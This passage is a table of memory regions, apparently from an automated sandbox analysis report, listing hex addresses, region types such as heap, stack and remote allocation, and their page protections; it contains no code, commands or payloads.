|
page read and write
|
||
|
2EBA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
20CCF000
|
trusted library allocation
|
page read and write
|
||
|
232A7000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBCA000
|
heap
|
page read and write
|
||
|
6E0B000
|
stack
|
page read and write
|
||
|
685000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22D50000
|
heap
|
page read and write
|
||
|
21672419000
|
heap
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
2165A2D1000
|
trusted library allocation
|
page read and write
|
||
|
22D7B000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
25E76F90000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
5737000
|
trusted library allocation
|
page read and write
|
||
|
94D54BE000
|
stack
|
page read and write
|
||
|
2E9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
14C38A35000
|
heap
|
page read and write
|
||
|
22CB0000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
785E000
|
stack
|
page read and write
|
||
|
4A9E000
|
stack
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
2BBD000
|
stack
|
page read and write
|
||
|
20C3C000
|
stack
|
page read and write
|
||
|
A6E52FD000
|
stack
|
page read and write
|
||
|
743E000
|
stack
|
page read and write
|
||
|
6C4D000
|
stack
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
87B2000
|
heap
|
page read and write
|
||
|
3021000
|
heap
|
page read and write
|
||
|
29D0000
|
unclassified section
|
page readonly
|
||
|
7E7000
|
unkown
|
page readonly
|
||
|
2165A50A000
|
trusted library allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
232E0000
|
trusted library allocation
|
page read and write
|
||
|
860C000
|
stack
|
page read and write
|
||
|
7E1000
|
unkown
|
page execute read
|
||
|
8772000
|
heap
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
5060000
|
direct allocation
|
page read and write
|
||
|
50AE000
|
heap
|
page read and write
|
||
|
28AD000
|
stack
|
page read and write
|
||
|
779E000
|
stack
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
50EF000
|
heap
|
page read and write
|
||
|
7FFE578B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
21672490000
|
heap
|
page read and write
|
||
|
8791000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBCA000
|
heap
|
page read and write
|
||
|
5390000
|
direct allocation
|
page read and write
|
||
|
3021000
|
heap
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
4410000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
7FFE57920000
|
trusted library allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
14C38787000
|
heap
|
page read and write
|
||
|
7FD000
|
unkown
|
page readonly
|
||
|
4DD9000
|
trusted library allocation
|
page read and write
|
||
|
20A40000
|
direct allocation
|
page read and write
|
||
|
232E7000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
216723E0000
|
heap
|
page read and write
|
||
|
4999000
|
stack
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
2EC2000
|
trusted library allocation
|
page read and write
|
||
|
22D31000
|
heap
|
page read and write
|
||
|
67E000
|
stack
|
page read and write
|
||
|
7FFE57950000
|
trusted library allocation
|
page read and write
|
||
|
7080000
|
heap
|
page read and write
|
||
|
21672730000
|
heap
|
page read and write
|
||
|
2E93000
|
trusted library allocation
|
page execute and read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
4810000
|
heap
|
page read and write
|
||
|
2165A2C9000
|
trusted library allocation
|
page read and write
|
||
|
7040000
|
heap
|
page read and write
|
||
|
21659E77000
|
trusted library allocation
|
page read and write
|
||
|
2FF0000
|
direct allocation
|
page read and write
|
||
|
232F0000
|
trusted library allocation
|
page read and write
|
||
|
44D0000
|
heap
|
page read and write
|
||
|
7E0000
|
unkown
|
page readonly
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
4789000
|
stack
|
page read and write
|
||
|
56F9000
|
trusted library allocation
|
page read and write
|
||
|
216721BA000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
2165B6DC000
|
trusted library allocation
|
page read and write
|
||
|
7FFE57A60000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
2165B480000
|
trusted library allocation
|
page read and write
|
||
|
2165A683000
|
trusted library allocation
|
page read and write
|
||
|
4EAE000
|
stack
|
page read and write
|
||
|
94D51FD000
|
stack
|
page read and write
|
||
|
7A1C000
|
stack
|
page read and write
|
||
|
2165A48C000
|
trusted library allocation
|
page read and write
|
||
|
2A18000
|
heap
|
page read and write
|
||
|
47CB000
|
stack
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
2E94000
|
trusted library allocation
|
page read and write
|
||
|
46C0000
|
heap
|
page read and write
|
||
|
4A5E000
|
stack
|
page read and write
|
||
|
25E77089000
|
heap
|
page read and write
|
||
|
2A64000
|
heap
|
page read and write
|
||
|
2ED0000
|
heap
|
page execute and read and write
|
||
|
A6E54FE000
|
stack
|
page read and write
|
||
|
2D2A000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
7E1000
|
unkown
|
page execute read
|
||
|
22D62000
|
heap
|
page read and write
|
||
|
232E0000
|
trusted library allocation
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
216580D8000
|
heap
|
page read and write
|
||
|
58D000
|
stack
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
25E76F20000
|
heap
|
page read and write
|
||
|
22E10000
|
direct allocation
|
page read and write
|
||
|
22D10000
|
heap
|
page read and write
|
||
|
2CF0000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
2EB2000
|
trusted library allocation
|
page read and write
|
||
|
22D73000
|
heap
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
232F0000
|
trusted library allocation
|
page read and write
|
||
|
22D70000
|
heap
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
21672405000
|
heap
|
page read and write
|
||
|
27DE000
|
stack
|
page read and write
|
||
|
2E2B000
|
heap
|
page read and write
|
||
|
2165B38E000
|
trusted library allocation
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
2165A486000
|
trusted library allocation
|
page read and write
|
||
|
7F190000
|
trusted library allocation
|
page execute and read and write
|
||
|
20A1F000
|
stack
|
page read and write
|
||
|
2165B347000
|
trusted library allocation
|
page read and write
|
||
|
2D1C000
|
heap
|
page read and write
|
||
|
22E43000
|
trusted library allocation
|
page read and write
|
||
|
21672433000
|
heap
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
5103000
|
heap
|
page read and write
|
||
|
864E000
|
stack
|
page read and write
|
||
|
7192000
|
heap
|
page read and write
|
||
|
2EA0000
|
trusted library allocation
|
page read and write
|
||
|
7340000
|
heap
|
page execute and read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
232F0000
|
trusted library allocation
|
page read and write
|
||
|
232E8000
|
trusted library allocation
|
page read and write
|
||
|
7FFE57890000
|
trusted library allocation
|
page read and write
|
||
|
5070000
|
direct allocation
|
page read and write
|
||
|
22DE0000
|
direct allocation
|
page read and write
|
||
|
639000
|
stack
|
page read and write
|
||
|
1BFFDCFB000
|
heap
|
page read and write
|
||
|
14C38A30000
|
heap
|
page read and write
|
||
|
8703000
|
heap
|
page read and write
|
||
|
25E76CA0000
|
heap
|
page read and write
|
||
|
22D10000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BF80022000
|
heap
|
page read and write
|
||
|
755000
|
heap
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
4460000
|
remote allocation
|
page execute and read and write
|
||
|
5102000
|
heap
|
page read and write
|
||
|
6DCE000
|
stack
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BF80012000
|
heap
|
page read and write
|
||
|
94D553E000
|
stack
|
page read and write
|
||
|
7FFE57A10000
|
trusted library allocation
|
page read and write
|
||
|
94D678A000
|
stack
|
page read and write
|
||
|
85CC000
|
stack
|
page read and write
|
||
|
5F9000
|
stack
|
page read and write
|
||
|
2F0F000
|
stack
|
page read and write
|
||
|
7FFE57A00000
|
trusted library allocation
|
page read and write
|
||
|
28D0000
|
unclassified section
|
page readonly
|
||
|
28C0000
|
unclassified section
|
page readonly
|
||
|
21672403000
|
heap
|
page read and write
|
||
|
94D4B43000
|
stack
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
94D660E000
|
stack
|
page read and write
|
||
|
94D55BE000
|
stack
|
page read and write
|
||
|
4570000
|
heap
|
page readonly
|
||
|
4690000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
20CCD000
|
trusted library allocation
|
page read and write
|
||
|
6D4D000
|
stack
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
216583D0000
|
heap
|
page read and write
|
||
|
7E5000
|
unkown
|
page readonly
|
||
|
733B000
|
stack
|
page read and write
|
||
|
7FFE57700000
|
trusted library allocation
|
page read and write
|
||
|
A6E53FF000
|
unkown
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
2FE0000
|
direct allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22D29000
|
heap
|
page read and write
|
||
|
8A80000
|
direct allocation
|
page read and write
|
||
|
2A77000
|
heap
|
page read and write
|
||
|
8FE000
|
stack
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22E30000
|
direct allocation
|
page read and write
|
||
|
22CF4000
|
heap
|
page read and write
|
||
|
495C000
|
stack
|
page read and write
|
||
|
2ECB000
|
trusted library allocation
|
page execute and read and write
|
||
|
53C7000
|
heap
|
page read and write
|
||
|
8A60000
|
trusted library allocation
|
page read and write
|
||
|
2165A6E2000
|
trusted library allocation
|
page read and write
|
||
|
2CE4000
|
trusted library allocation
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
21CB7000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
5080000
|
heap
|
page read and write
|
||
|
232D0000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
7FFE579B0000
|
trusted library allocation
|
page read and write
|
||
|
2165B34C000
|
trusted library allocation
|
page read and write
|
||
|
2165A2F6000
|
trusted library allocation
|
page read and write
|
||
|
2167214E000
|
heap
|
page read and write
|
||
|
70F5000
|
heap
|
page read and write
|
||
|
296E000
|
stack
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
5360000
|
direct allocation
|
page read and write
|
||
|
22E43000
|
trusted library allocation
|
page read and write
|
||
|
2F9C000
|
stack
|
page read and write
|
||
|
7E5000
|
unkown
|
page readonly
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
25E76E20000
|
heap
|
page read and write
|
||
|
7E7000
|
unkown
|
page readonly
|
||
|
216721DD000
|
heap
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
25E77080000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22D72000
|
heap
|
page read and write
|
||
|
5108000
|
heap
|
page read and write
|
||
|
50D4000
|
heap
|
page read and write
|
||
|
20600000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
216580D2000
|
heap
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
20C85000
|
trusted library allocation
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
2CC0000
|
trusted library section
|
page read and write
|
||
|
22DC0000
|
trusted library allocation
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
2AB1000
|
heap
|
page read and write
|
||
|
21672470000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
6AAE000
|
stack
|
page read and write
|
||
|
216580DE000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
22D34000
|
heap
|
page read and write
|
||
|
20A30000
|
direct allocation
|
page read and write
|
||
|
8AB0000
|
direct allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
94D507E000
|
stack
|
page read and write
|
||
|
22D3B000
|
heap
|
page read and write
|
||
|
7E0000
|
unkown
|
page readonly
|
||
|
216583D5000
|
heap
|
page read and write
|
||
|
21658370000
|
trusted library allocation
|
page read and write
|
||
|
2165C0DC000
|
trusted library allocation
|
page read and write
|
||
|
6BE000
|
stack
|
page read and write
|
||
|
209DE000
|
stack
|
page read and write
|
||
|
22D3C000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
6F5E000
|
stack
|
page read and write
|
||
|
799C000
|
stack
|
page read and write
|
||
|
1BFFDBCA000
|
heap
|
page read and write
|
||
|
7FFE57970000
|
trusted library allocation
|
page read and write
|
||
|
1BF80026000
|
heap
|
page read and write
|
||
|
466C000
|
stack
|
page read and write
|
||
|
22E20000
|
direct allocation
|
page read and write
|
||
|
2B78000
|
heap
|
page read and write
|
||
|
25E77090000
|
heap
|
page read and write
|
||
|
232D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE578A1000
|
trusted library allocation
|
page read and write
|
||
|
8980000
|
trusted library allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
232F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE577A0000
|
trusted library allocation
|
page read and write
|
||
|
3FB000
|
stack
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
4DC2000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
6F9E000
|
stack
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
25E77089000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
79E000
|
stack
|
page read and write
|
||
|
2165CE19000
|
trusted library allocation
|
page read and write
|
||
|
7DE000
|
stack
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
769E000
|
stack
|
page read and write
|
||
|
22D4F000
|
heap
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
20290000
|
unclassified section
|
page readonly
|
||
|
49DC000
|
stack
|
page read and write
|
||
|
2E04000
|
heap
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
50FC000
|
heap
|
page read and write
|
||
|
6BBF000
|
stack
|
page read and write
|
||
|
4D7C000
|
stack
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
2165A472000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
7FFE579C0000
|
trusted library allocation
|
page read and write
|
||
|
2165A2BE000
|
trusted library allocation
|
page read and write
|
||
|
22C8E000
|
stack
|
page read and write
|
||
|
17607FE000
|
stack
|
page read and write
|
||
|
232C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
78DE000
|
stack
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
87CF000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
20B50000
|
heap
|
page read and write
|
||
|
7FFE57960000
|
trusted library allocation
|
page read and write
|
||
|
7FFE57A40000
|
trusted library allocation
|
page read and write
|
||
|
2165B100000
|
trusted library allocation
|
page read and write
|
||
|
7FFE579F0000
|
trusted library allocation
|
page read and write
|
||
|
23320000
|
trusted library allocation
|
page read and write
|
||
|
21659C60000
|
heap
|
page read and write
|
||
|
514C000
|
heap
|
page read and write
|
||
|
2CE0000
|
trusted library allocation
|
page read and write
|
||
|
2D0E000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22DC0000
|
trusted library allocation
|
page read and write
|
||
|
232D0000
|
trusted library allocation
|
page read and write
|
||
|
6B3F000
|
stack
|
page read and write
|
||
|
8AE0000
|
direct allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
515C000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
209A0000
|
remote allocation
|
page read and write
|
||
|
4B1E000
|
stack
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
2165CC6C000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
232C0000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
70ED000
|
heap
|
page read and write
|
||
|
21658200000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BFFDBCA000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BF80006000
|
heap
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
94D4E7E000
|
stack
|
page read and write
|
||
|
2B26000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
7FFE576F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2167221B000
|
heap
|
page read and write
|
||
|
53A0000
|
direct allocation
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
14C3878E000
|
heap
|
page read and write
|
||
|
2165A47C000
|
trusted library allocation
|
page read and write
|
||
|
94D670A000
|
stack
|
page read and write
|
||
|
6A10000
|
trusted library allocation
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
5108000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
232C0000
|
trusted library allocation
|
page read and write
|
||
|
509B000
|
heap
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
21672293000
|
heap
|
page read and write
|
||
|
89FE000
|
stack
|
page read and write
|
||
|
232D0000
|
trusted library allocation
|
page read and write
|
||
|
20820000
|
trusted library allocation
|
page read and write
|
||
|
216580F2000
|
heap
|
page read and write
|
||
|
232D0000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
1BF80017000
|
heap
|
page read and write
|
||
|
20C51000
|
trusted library allocation
|
page read and write
|
||
|
28EE000
|
stack
|
page read and write
|
||
|
4EB000
|
stack
|
page read and write
|
||
|
21658270000
|
heap
|
page read and write
|
||
|
8746000
|
heap
|
page read and write
|
||
|
202A0000
|
unclassified section
|
page readonly
|
||
|
5134000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
77DE000
|
stack
|
page read and write
|
||
|
14C3A290000
|
heap
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
1BF80003000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
8AA0000
|
direct allocation
|
page read and write
|
||
|
709E000
|
heap
|
page read and write
|
||
|
7FFE578C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D8A000
|
stack
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
5105000
|
heap
|
page read and write
|
||
|
20C40000
|
heap
|
page read and write
|
||
|
86F0000
|
heap
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
17606FE000
|
stack
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
94D52BE000
|
stack
|
page read and write
|
||
|
2165CC4A000
|
trusted library allocation
|
page read and write
|
||
|
21658190000
|
heap
|
page read and write
|
||
|
50D4000
|
heap
|
page read and write
|
||
|
23300000
|
trusted library allocation
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
2165A6C1000
|
trusted library allocation
|
page read and write
|
||
|
2A53000
|
heap
|
page read and write
|
||
|
2F40000
|
direct allocation
|
page read and write
|
||
|
2E90000
|
trusted library allocation
|
page read and write
|
||
|
232E0000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
529000
|
stack
|
page read and write
|
||
|
22F9B000
|
stack
|
page read and write
|
||
|
2165CC4E000
|
trusted library allocation
|
page read and write
|
||
|
2165A6CF000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
14C386E0000
|
heap
|
page read and write
|
||
|
216583C7000
|
heap
|
page read and write
|
||
|
509B000
|
heap
|
page read and write
|
||
|
70F0000
|
heap
|
page read and write
|
||
|
515A000
|
heap
|
page read and write
|
||
|
8B10000
|
direct allocation
|
page execute and read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
7FFE57A50000
|
trusted library allocation
|
page read and write
|
||
|
7FFE577D6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2165A2E1000
|
trusted library allocation
|
page read and write
|
||
|
2165B47E000
|
trusted library allocation
|
page read and write
|
||
|
73FE000
|
stack
|
page read and write
|
||
|
50AD000
|
heap
|
page read and write
|
||
|
5134000
|
heap
|
page read and write
|
||
|
2870000
|
heap
|
page read and write
|
||
|
56D1000
|
trusted library allocation
|
page read and write
|
||
|
14C38670000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
22D73000
|
heap
|
page read and write
|
||
|
22CC0000
|
heap
|
page read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
7FFE576F4000
|
trusted library allocation
|
page read and write
|
||
|
86A0000
|
trusted library allocation
|
page read and write
|
||
|
1BF80026000
|
heap
|
page read and write
|
||
|
7FFE577A6000
|
trusted library allocation
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
232D0000
|
trusted library allocation
|
page read and write
|
||
|
2F30000
|
heap
|
page readonly
|
||
|
22E61000
|
heap
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
22CA0000
|
trusted library allocation
|
page read and write
|
||
|
21659B90000
|
heap
|
page execute and read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
2A96000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
86D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE576F0000
|
trusted library allocation
|
page read and write
|
||
|
70A6000
|
heap
|
page read and write
|
||
|
2165A697000
|
trusted library allocation
|
page read and write
|
||
|
25E77085000
|
heap
|
page read and write
|
||
|
5874000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
868E000
|
stack
|
page read and write
|
||
|
2165C802000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
73BE000
|
stack
|
page read and write
|
||
|
2167215A000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
7DE000
|
stack
|
page read and write
|
||
|
94D523F000
|
stack
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
21672499000
|
heap
|
page read and write
|
||
|
791C000
|
stack
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
20AC8000
|
stack
|
page read and write
|
||
|
2165B300000
|
trusted library allocation
|
page read and write
|
||
|
5863000
|
trusted library allocation
|
page read and write
|
||
|
708E000
|
heap
|
page read and write
|
||
|
22D3D000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
21659B96000
|
heap
|
page execute and read and write
|
||
|
2165B354000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
70CB000
|
heap
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
1BF80026000
|
heap
|
page read and write
|
||
|
7E7000
|
unkown
|
page readonly
|
||
|
2166A0E9000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
14C38780000
|
heap
|
page read and write
|
||
|
84F7000
|
stack
|
page read and write
|
||
|
8A90000
|
direct allocation
|
page read and write
|
||
|
6E5E000
|
stack
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
795E000
|
stack
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
7618000
|
stack
|
page read and write
|
||
|
2165811E000
|
heap
|
page read and write
|
||
|
216583B0000
|
trusted library allocation
|
page read and write
|
||
|
758D000
|
stack
|
page read and write
|
||
|
53C0000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
8A40000
|
trusted library allocation
|
page read and write
|
||
|
7458000
|
heap
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
7E1000
|
unkown
|
page execute read
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
461F000
|
remote allocation
|
page execute and read and write
|
||
|
5134000
|
heap
|
page read and write
|
||
|
93E000
|
unkown
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
2EAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
21672370000
|
heap
|
page execute and read and write
|
||
|
6E9B000
|
stack
|
page read and write
|
||
|
23310000
|
trusted library allocation
|
page read and write
|
||
|
21669E10000
|
trusted library allocation
|
page read and write
|
||
|
21658119000
|
heap
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
2F57000
|
heap
|
page read and write
|
||
|
8A3C000
|
stack
|
page read and write
|
||
|
2CAF000
|
unkown
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
50C4000
|
heap
|
page read and write
|
||
|
232C0000
|
trusted library allocation
|
page read and write
|
||
|
2165A460000
|
trusted library allocation
|
page read and write
|
||
|
4CBE000
|
stack
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
25E77089000
|
heap
|
page read and write
|
||
|
2B26000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
2B26000
|
heap
|
